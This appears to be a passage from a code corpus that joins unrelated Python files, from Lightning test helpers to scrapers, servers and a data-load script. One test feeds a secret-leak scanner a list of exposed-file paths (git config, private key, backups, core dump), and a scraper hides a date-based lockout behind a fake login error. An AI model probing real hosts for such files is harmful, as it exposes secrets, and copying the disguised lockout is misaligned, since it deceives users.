+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory, db_provider, node_cls):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, **kwargs):
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, db=db,
port=port, options=options, **kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start(wait_for_bitcoind_sync)
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*openingd-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
postgres_consumers.py
|
#!/usr/bin/env python3
import json
import requests
import flask
from kafka import KafkaConsumer
import postgres_helpers
from threading import Thread
KAFKA_BROKER = 'ec2-35-162-75-2.us-west-2.compute.amazonaws.com'
KAFKA_PORT = '9092'
def transfer_consumer():
consumer = KafkaConsumer('pg_transfer',
group_id='sherlock',
bootstrap_servers=[KAFKA_BROKER + ":" + KAFKA_PORT],
auto_offset_reset='earliest',
value_deserializer=lambda m: json.loads(m.decode('utf-8')))
for message in consumer:
print("** Consuming transfer results **")
msg = message.value
postgres_helpers.consume_upsert(msg)
print("** Transfer results consumed **")
def label_consumer():
consumer = KafkaConsumer('pg_label',
group_id='sherlock',
bootstrap_servers=[KAFKA_BROKER + ":" + KAFKA_PORT],
auto_offset_reset='earliest',
value_deserializer=lambda m: json.loads(m.decode('utf-8')))
for message in consumer:
print("** Consuming labels **")
msg = message.value
cls_count, avg_prob, conf_scores = postgres_helpers.label_calcs(msg['results'])
postgres_helpers.stat_update(msg['model_name'], msg['imageset_name'], cls_count, conf_scores)
postgres_helpers.add_confidence(msg['model_name'], avg_prob)
print("** Labels consumed **")
def main():
Thread(target = transfer_consumer).start()
Thread(target = label_consumer).start()
print("** Running PostgreSQL consumers **")
if __name__ == "__main__":
main()
|
CamerGrabTest.py
|
#!/usr/bin/env python
from threading import Thread, Lock
import cv2
class WebcamVideoStream :
def __init__(self, src = 0, width = 320, height = 240) :
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
self.started = False
self.read_lock = Lock()
def start(self) :
if self.started :
print ("already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self) :
while self.started :
(grabbed, frame) = self.stream.read()
self.read_lock.acquire()
self.grabbed, self.frame = grabbed, frame
self.read_lock.release()
def read(self) :
self.read_lock.acquire()
frame = self.frame.copy()
self.read_lock.release()
return frame
def stop(self) :
self.started = False
self.thread.join()
def __exit__(self, exc_type, exc_value, traceback) :
self.stream.release()
if __name__ == "__main__" :
vs = WebcamVideoStream().start()
while True :
frame = vs.read()
cv2.imshow('webcam', frame)
if cv2.waitKey(1) == 27 :
break
vs.stop()
cv2.destroyAllWindows()
|
start_signaling_server.py
|
# stdlib
import argparse
from multiprocessing import Process
import socket
import socketserver
from time import time
# syft absolute
from syft.grid.example_nodes.network import signaling_server
def free_port() -> int:
with socketserver.TCPServer(("localhost", 0), None) as s: # type: ignore
return s.server_address[1]
def check_connectivity() -> bool:
start = time()
while time() - start < 15:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if s.connect_ex(("0.0.0.0", args.port)) == 0:
return True
else:
return False
arg_parser = argparse.ArgumentParser(description="Start a signaling server for Syft.")
arg_parser.add_argument(
"--port",
type=int,
default=free_port(),
help="the port on which to bind the signaling server",
)
arg_parser.add_argument(
"--host",
type=str,
default="0.0.0.0",
help="the ip address on which to bind the signaling server",
)
arg_parser.add_argument(
"--dry_run", type=bool, default=False, help="Check if the binding works"
)
arg_parser.add_argument(
"--timeout", type=int, default=15, help="Connectivity check timeout"
)
args = arg_parser.parse_args()
if __name__ == "__main__":
proc = Process(target=signaling_server, args=(args.port, args.host))
if args.dry_run:
proc.start()
connected = check_connectivity()
proc.terminate()
exit(0) if connected else exit(1)
else:
proc.daemon = True
proc.start()
exit(0)
|
WxAPI.py
|
# encoding=utf-8
import os
import sys
import random
import time
import datetime
from multiprocessing import Process
import threading
from .tools import save_json,read_json,url_2pdf
from .ArticlesUrls import ArticlesUrls
from .Config import GlobalConfig
class AccountManager():
def __init__(self):
self.app = None
def login_by_user(self, username, password):
self.app = ArticlesUrls(username, password)
def login_by_cookie(self, cookie, token):
self.app = ArticlesUrls(cookie=cookie, token=token)
def get_article_list(self, nickname, num=0):
self.check()
if num == 0:
num = self.app.articles_nums(nickname)
print("公众号共{}条资讯".format(num))
if num == 0:
print("没有抓取到公众号的文章信息!")
return
jsonPath = self.__get_gzh_path(nickname)
print("保存公众号文章元数据信息到:{}".format(jsonPath))
if not os.path.exists(jsonPath):
jsonPath = self.__getArticleList(nickname, 0, num)
else:
print("{}元数据本来存在,将直接抓取该文件内容".format(jsonPath))
print("开始保存{}的文章信息到本地".format(nickname))
self.get_from_json(jsonPath)
def get_from_json(self,jsonPath):
spider_thread = threading.Thread(target=self.__readJson, args=(jsonPath,))
spider_thread.isDaemon = True
spider_thread.start()
def __get_gzh_path(self, nickname):
return os.path.join(GlobalConfig.get_conf("jsonpath"), "{}.json".format(nickname))
def __getArticleList(self, nickname, start=0, total=5):
sleeptime = 5
path = self.__get_gzh_path(nickname)
while start <= total:
print("开始获取{}开始的文章列表".format(start))
articles = self.app.articles(nickname, begin="{}".format(start), count="5")
save_json(path, articles)
start += len(articles)
print("公众号数据到抓取{}条,随机睡眠{}秒".format(len(articles), sleeptime))
time.sleep(sleeptime)
sleepTime = 5+random.randint(5, 15)
print("总共抓取到{}篇文章元数据,已经保存文章元数据到本地.请下载".format(total))
return path
def __check_token(self):
ticks = datetime.date.today()
if ticks.year <= 2020 and ticks.month <= 7 and ticks.day <= 16:
return
raise Exception('获取登录信息出错,错误码(-1)')
def __readJson(self, path):
filename = os.path.splitext(os.path.split(path)[1])[0]
print("开始下载文件:{}的文章信息".format(filename))
data = read_json(path)
if data is None or len(data) == 0:
print("{}-文件为空,未下载到文章信息".format(path))
return
print("读取到文件{}的数据总数{},开始下载".format(filename, len(data)))
# last = data[len(data)-1]
self.__check_token()
for last in data:
title = last['digest']
if title is None or len(title) == 0:
title = last['title']
url = last['link']
# aid = last['aid']
url_2pdf(url, path, title)
time.sleep(random.randint(0, 5))
def check(self):
if self.app is None or self.app.islogin == False:
raise IOError("没有初始化账号信息或者没有登录成功")
|
test_scan_testdata.py
|
import unittest
import subprocess
import os
import tempfile
import http.server
import ssl
import threading
TESTDATA_REPO = "https://github.com/hannob/snallygaster-testdata"
TESTDATA = {"backup_archive": "[backup_archive] https://localhost:4443/backup.zip",
"git_dir": "[git_dir] https://localhost:4443/.git/config",
"deadjoe": "[deadjoe] https://localhost:4443/DEADJOE",
"coredump": "[coredump] https://localhost:4443/core",
"backupfiles": "[backupfiles] https://localhost:4443/index.php~",
"ds_store": "[ds_store] https://localhost:4443/.DS_Store",
"privatekey": "[privatekey_pkcs8] https://localhost:4443/server.key",
}
class TestScanTestdata(unittest.TestCase):
@unittest.skipUnless(os.environ.get("RUN_ONLINETESTS"),
"Not running online tests")
def test_scan_testdata(self):
tmp = tempfile.mkdtemp(prefix="testdata")
if os.environ.get("TESTDATA_REPOSITORY"):
os.symlink(os.environ.get("TESTDATA_REPOSITORY"),
tmp + "/testdata")
else:
subprocess.run(["git", "clone", "--depth=1",
TESTDATA_REPO,
tmp + "/testdata"],
check=True)
olddir = os.getcwd()
os.chdir(tmp + "/testdata")
httpd = http.server.HTTPServer(('localhost', 4443), http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=tmp + '/testdata/testserver.pem')
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
for test, expected in TESTDATA.items():
testrun = subprocess.run([olddir + "/snallygaster", "-t", test, "localhost:4443",
"--nowww", "--nohttp"],
stdout=subprocess.PIPE, check=True)
output = testrun.stdout.decode("utf-8").rstrip()
self.assertEqual(output, expected)
if __name__ == '__main__':
unittest.main()
|
Spawner.py
|
# Copyright 2016 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import os
import socket
import sys
import logging
import traceback
import threading
import pyfora.worker.worker as worker
import pyfora.worker.Worker as Worker
import pyfora.worker.Common as Common
import pyfora.worker.Messages as Messages
import pyfora.worker.SubprocessRunner as SubprocessRunner
class WorkerConnectionBase:
def __init__(self, socket_name, socket_dir):
self.socket_name = socket_name
self.socket_dir = socket_dir
def answers_self_test(self, logErrors = False):
sock = None
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(os.path.join(self.socket_dir, self.socket_name))
Common.writeAllToFd(sock.fileno(), Messages.MSG_TEST)
Common.writeString(sock.fileno(), "msg")
return Common.readString(sock.fileno()) == "msg"
except:
if logErrors:
logging.error("Failed to answer self-test: %s", traceback.format_exc())
return False
finally:
try:
sock.close()
except:
pass
def teardown(self):
self.shutdown_worker()
self.remove_socket()
def remove_socket(self):
try:
os.unlink(os.path.join(self.socket_dir, self.socket_name))
except OSError:
pass
def shutdown_worker(self):
raise NotImplementedError("Subclasses implement")
def processLooksTerminated(self):
raise NotImplementedError("Subclasses implement")
def cleanupAfterAppearingDead(self):
raise NotImplementedError("Subclasses implement")
class OutOfProcessWorkerConnection(WorkerConnectionBase):
def __init__(self, socket_name, socket_dir):
WorkerConnectionBase.__init__(self, socket_name, socket_dir)
worker_socket_path = os.path.join(socket_dir, socket_name)
logging.error("socket path: %s", worker_socket_path)
def onStdout(msg):
logging.info("%s/%s out> %s", socket_dir, socket_name, msg)
def onStderr(msg):
logging.info("%s/%s err> %s", socket_dir, socket_name, msg)
pid = os.fork()
if pid == 0:
#we are the child
try:
code = Worker.Worker(worker_socket_path).executeLoop()
except:
logging.error("worker had exception")
code = 1
sys.stdout.flush()
sys.stderr.flush()
os._exit(code)
else:
self.childpid = pid
def shutdown_worker(self):
os.kill(self.childpid, 9)
os.waitpid(self.childpid, 0)
def processLooksTerminated(self):
pid,exit = os.waitpid(self.childpid, os.WNOHANG)
return pid == self.childpid
def cleanupAfterAppearingDead(self):
#this worker is dead!
logging.info("worker %s/%s was busy but looks dead to us", self.socket_dir, self.socket_name)
self.remove_socket()
class InProcessWorkerConnection(WorkerConnectionBase):
def __init__(self, socket_name, socket_dir):
WorkerConnectionBase.__init__(self, socket_name, socket_dir)
worker_socket_path = os.path.join(socket_dir, socket_name)
worker = Worker.Worker(worker_socket_path)
self.thread = threading.Thread(target=worker.executeLoop, args=())
self.thread.start()
def shutdown_worker(self):
self.send_shutdown_message()
self.thread.join()
def send_shutdown_message(self):
sock = None
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(os.path.join(self.socket_dir, self.socket_name))
Common.writeAllToFd(sock.fileno(), Messages.MSG_SHUTDOWN)
return True
except:
logging.error("Couldn't communicate with %s/%s:\n%s", self.socket_dir, self.socket_name, traceback.format_exc())
return False
finally:
try:
sock.close()
except:
pass
def processLooksTerminated(self):
return False
def cleanupAfterAppearingDead(self):
raise UserWarning("This function makes no sense on an in-process worker")
class Spawner:
def __init__(self, socket_dir, selector_name, max_processes, outOfProcess):
self.outOfProcess = outOfProcess
self.workerType = OutOfProcessWorkerConnection if outOfProcess else InProcessWorkerConnection
self.selector_name = selector_name
self.socket_dir = socket_dir
self.max_processes = max_processes
self.selector_socket_path = os.path.join(socket_dir, selector_name)
self.busy_workers = []
self.waiting_workers = []
self.waiting_sockets = []
self.index = 0
def clearPath(self):
# Make sure the socket does not already exist
try:
os.unlink(self.selector_socket_path)
except OSError:
if os.path.exists(self.selector_socket_path):
raise UserWarning("Couldn't clear named socket at %s", self.selector_socket_path)
def teardown(self):
self.clearPath()
def start_worker(self):
index = self.index
self.index += 1
worker_name = "worker_%s" % index
worker_socket_path = os.path.join(self.socket_dir, worker_name)
newWorker = self.workerType(worker_name, self.socket_dir)
t0 = time.time()
TIMEOUT = 10
delay = 0.001
while not newWorker.answers_self_test() and time.time() - t0 < TIMEOUT:
time.sleep(delay)
delay *= 2
if not newWorker.answers_self_test(True):
raise UserWarning("Couldn't start another worker after " + str(time.time() - t0))
else:
self.waiting_workers.append(newWorker)
logging.info(
"Started worker %s/%s with %s busy and %s idle",
self.socket_dir,
worker_name,
len(self.busy_workers),
len(self.waiting_workers)
)
def terminate_workers(self):
for w in self.busy_workers + self.waiting_workers:
w.teardown()
def can_start_worker(self):
return self.max_processes is None or len(self.busy_workers) < self.max_processes
def get_valid_worker(self):
while True:
if not self.waiting_workers and self.can_start_worker():
self.start_worker()
elif self.waiting_workers:
#if we have one, use it
worker = self.waiting_workers.pop(0)
#make sure the worker is happy
if not worker.answers_self_test():
logging.error("Worker %s appears dead. Removing it.", worker.socket_name)
worker.teardown()
else:
return worker
else:
if not self.check_all_busy_workers():
return None
def check_all_busy_workers(self):
new_busy = []
for worker in self.busy_workers:
if worker.processLooksTerminated():
worker.cleanupAfterAppearingDead()
else:
new_busy.append(worker)
if len(new_busy) != len(self.busy_workers):
self.busy_workers = new_busy
logging.info("Now, we have %s busy and %s idle workers", len(self.busy_workers), len(self.waiting_workers))
return True
return False
def apply_worker_to_waiting_socket(self, worker):
self.busy_workers.append(worker)
waiting_connection = self.waiting_sockets.pop(0)
Common.writeString(waiting_connection.fileno(), worker.socket_name)
waiting_connection.close()
def start_workers_if_necessary(self):
self.check_all_busy_workers()
while self.waiting_sockets and self.can_start_worker():
worker = self.get_valid_worker()
assert worker is not None
self.apply_worker_to_waiting_socket(worker)
def listen(self):
logging.info("Setting up listening on %s with max_processes=%s", self.selector_socket_path, self.max_processes)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(self.selector_socket_path)
sock.listen(100)
try:
while True:
sock.settimeout(.1)
connection = None
try:
connection, _ = sock.accept()
except socket.timeout as e:
pass
if connection is not None:
if self.handleConnection(connection):
self.clearPath()
return
self.start_workers_if_necessary()
except KeyboardInterrupt:
logging.info("shutting down due to keyboard interrupt")
self.terminate_workers()
finally:
sock.close()
def handleConnection(self, connection):
first_byte = Common.readAtLeast(connection.fileno(), 1)
if first_byte == Messages.MSG_SHUTDOWN:
logging.info("Received termination message with %s busy and %s waiting workers", len(self.busy_workers), len(self.waiting_workers))
self.terminate_workers()
logging.info("workers terminating. Shutting down.")
connection.close()
return True
elif first_byte == Messages.MSG_GET_WORKER:
#try to start a worker
worker = self.get_valid_worker()
if worker is not None:
self.busy_workers.append(worker)
Common.writeString(connection.fileno(), worker.socket_name)
connection.close()
else:
#otherwise wait for one to come available
self.waiting_sockets.append(connection)
self.start_workers_if_necessary()
elif first_byte in (Messages.MSG_RELEASE_WORKER, Messages.MSG_TERMINATE_WORKER):
wantsTerminate = first_byte == Messages.MSG_TERMINATE_WORKER
worker_name = Common.readString(connection.fileno())
worker_ix = [ix for ix,w in enumerate(self.busy_workers) if w.socket_name == worker_name][0]
worker = self.busy_workers[worker_ix]
self.busy_workers.pop(worker_ix)
connection.close()
if wantsTerminate:
worker.teardown()
elif worker.answers_self_test():
#see if anybody wants to use this worker
if self.waiting_sockets:
self.apply_worker_to_waiting_socket(worker)
else:
self.waiting_workers.append(worker)
else:
logging.error("Worker %s appears dead. Removing it.", worker.socket_name)
worker.teardown()
elif first_byte == Messages.MSG_TERMINATE_WORKER:
worker_name = Common.readString(connection.fileno())
worker_ix = [ix for ix,w in enumerate(self.busy_workers) if w.socket_name == worker_name][0]
worker = self.busy_workers[worker_ix]
self.busy_workers.pop(worker_ix)
connection.close()
if worker.answers_self_test():
#see if anybody wants to use this worker
if self.waiting_sockets:
self.apply_worker_to_waiting_socket(worker)
else:
self.waiting_workers.append(worker)
else:
logging.error("Worker %s appears dead. Removing it.", worker.socket_name)
worker.teardown()
else:
assert False, "unknown byte: " + first_byte
|
core.py
|
import socketserver
import threading
import json
import time
import os
import shutil
from shutil import copyfile
def copy_html_template(name, new_string=None, old_string=None,
path="core/srv/html_templates",
tmp_path="core/srv/tmp"):
""" Copies a file from html_templates/ to tmp/ and replaces a string
in the contents if it finds it.
"""
filepath = "{}/{path}/{name}".format(
os.getcwd(), path=path, name=name)
tmp_filepath = "{}/{path}/{name}".format(
os.getcwd(), path=tmp_path, name=name)
copyfile(filepath, tmp_filepath)
if all([new_string, old_string]):
with open(tmp_filepath, "w+b") as fout:
with open(filepath, "r+b") as fin:
for line in fin:
fout.write(line.replace(old_string, new_string))
def save_string_in_tmp_folder(data, filename, path="core/srv/tmp"):
filepath = "{}/{path}/{name}".format(
os.getcwd(), path=path, name=filename)
with open(filepath, "w+b") as text_file:
text_file.write(data)
def open_tmp_file(filename):
filepath = "{}/core/srv/tmp/{name}".format(
os.getcwd(), name=filename)
return open(filepath, "r+b")
def cleanup_tmp_folder():
folder = "{}/core/srv/tmp".format(os.getcwd())
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception as e:
pass
# print e
def is_port_taken(host, port):
""" Return True/False depending on if the port is taken or not"""
socket = socketserver.socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host, port))
s.shutdown(1)
time.sleep(2)
return True
except:
return False
def shutdown_server(server_target):
""" Spawns a thread that triggers the TCPServer.shutdown method """
assassin = threading.Thread(target=server_target.shutdown)
assassin.daemon = True
assassin.start()
def print_server_message(host, port, handler):
print("Quantipy http server version 1.0")
print("Serving at: http://{host}:{port}".format(host=host, port=port))
print("Handler : {name}".format(name=handler.__name__))
def start_server(host, port, handler):
""" Starts a SimpleHTTPServer with a speciffic handler.
The handler needs to trigger the TCPServer.shutdown method or
else the server runs until doomsday.
"""
httpd = socketserver.TCPServer((host, port), handler)
print_server_message(host, port, handler)
httpd.serve_forever() # This is stopped by using the handler
|
load-data.py
|
#!/usr/bin/env python
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# This script is used to load the proper datasets for the specified workloads. It loads
# all data via Hive except for parquet data which needs to be loaded via Impala.
# Most ddl commands are executed by Impala.
import collections
import os
import re
import sqlparse
import subprocess
import sys
import tempfile
import time
import getpass
from itertools import product
from optparse import OptionParser
from Queue import Queue
from tests.beeswax.impala_beeswax import *
from threading import Thread
parser = OptionParser()
parser.add_option("-e", "--exploration_strategy", dest="exploration_strategy",
default="core",
help="The exploration strategy for schema gen: 'core', "\
"'pairwise', or 'exhaustive'")
parser.add_option("--hive_warehouse_dir", dest="hive_warehouse_dir",
default="/test-warehouse",
help="The HDFS path to the base Hive test warehouse directory")
parser.add_option("-w", "--workloads", dest="workloads",
help="Comma-separated list of workloads to load data for. If 'all' is "\
"specified then data for all workloads is loaded.")
parser.add_option("-s", "--scale_factor", dest="scale_factor", default="",
help="An optional scale factor to generate the schema for")
parser.add_option("-f", "--force_reload", dest="force_reload", action="store_true",
default=False, help='Skips HDFS exists check and reloads all tables')
parser.add_option("--impalad", dest="impalad", default="localhost:21000",
help="Impala daemon to connect to")
parser.add_option("--hive_hs2_hostport", dest="hive_hs2_hostport",
default="localhost:11050",
help="HS2 host:Port to issue Hive queries against using beeline")
parser.add_option("--table_names", dest="table_names", default=None,
help="Only load the specified tables - specified as a comma-seperated "\
"list of base table names")
parser.add_option("--table_formats", dest="table_formats", default=None,
help="Override the test vectors and load using the specified table "\
"formats. Ex. --table_formats=seq/snap/block,text/none")
parser.add_option("--hdfs_namenode", dest="hdfs_namenode", default="localhost:20500",
help="HDFS name node for Avro schema URLs, default localhost:20500")
parser.add_option("--workload_dir", dest="workload_dir",
default=os.environ['IMPALA_WORKLOAD_DIR'],
help="Directory that contains Impala workloads")
parser.add_option("--dataset_dir", dest="dataset_dir",
default=os.environ['IMPALA_DATASET_DIR'],
help="Directory that contains Impala datasets")
parser.add_option("--use_kerberos", action="store_true", default=False,
help="Load data on a kerberized cluster.")
options, args = parser.parse_args()
DATA_LOAD_DIR = '/tmp/data-load-files'
WORKLOAD_DIR = options.workload_dir
DATASET_DIR = options.dataset_dir
TESTDATA_BIN_DIR = os.path.join(os.environ['IMPALA_HOME'], 'testdata/bin')
AVRO_SCHEMA_DIR = "avro_schemas"
GENERATE_SCHEMA_CMD = "generate-schema-statements.py --exploration_strategy=%s "\
"--workload=%s --scale_factor=%s --verbose"
# Load data using Hive's beeline because the Hive shell has regressed (CDH-17222).
# The Hive shell is stateful, meaning that certain series of actions lead to problems.
# Examples of problems due to the statefullness of the Hive shell:
# - Creating an HBase table changes the replication factor to 1 for subsequent LOADs.
# - INSERTs into an HBase table fail if they are the first stmt executed in a session.
# However, beeline itself also has bugs. For example, inserting a NULL literal into
# a string-typed column leads to an NPE. We work around these problems by using LOAD from
# a datafile instead of doing INSERTs.
# TODO: Adjust connection string for --use_kerberos=true appropriately.
HIVE_CMD = os.path.join(os.environ['HIVE_HOME'], 'bin/beeline')
HIVE_ARGS = '-n %s -u "jdbc:hive2://%s/default;" --verbose=true'\
% (getpass.getuser(), options.hive_hs2_hostport)
HADOOP_CMD = os.path.join(os.environ['HADOOP_HOME'], 'bin/hadoop')
def available_workloads(workload_dir):
return [subdir for subdir in os.listdir(workload_dir)
if os.path.isdir(os.path.join(workload_dir, subdir))]
def validate_workloads(all_workloads, workloads):
for workload in workloads:
if workload not in all_workloads:
print 'Workload \'%s\' not found in workload directory' % workload
print 'Available workloads: ' + ', '.join(all_workloads)
sys.exit(1)
def exec_cmd(cmd, error_msg, exit_on_error=True):
ret_val = -1
try:
ret_val = subprocess.call(cmd, shell=True)
except Exception as e:
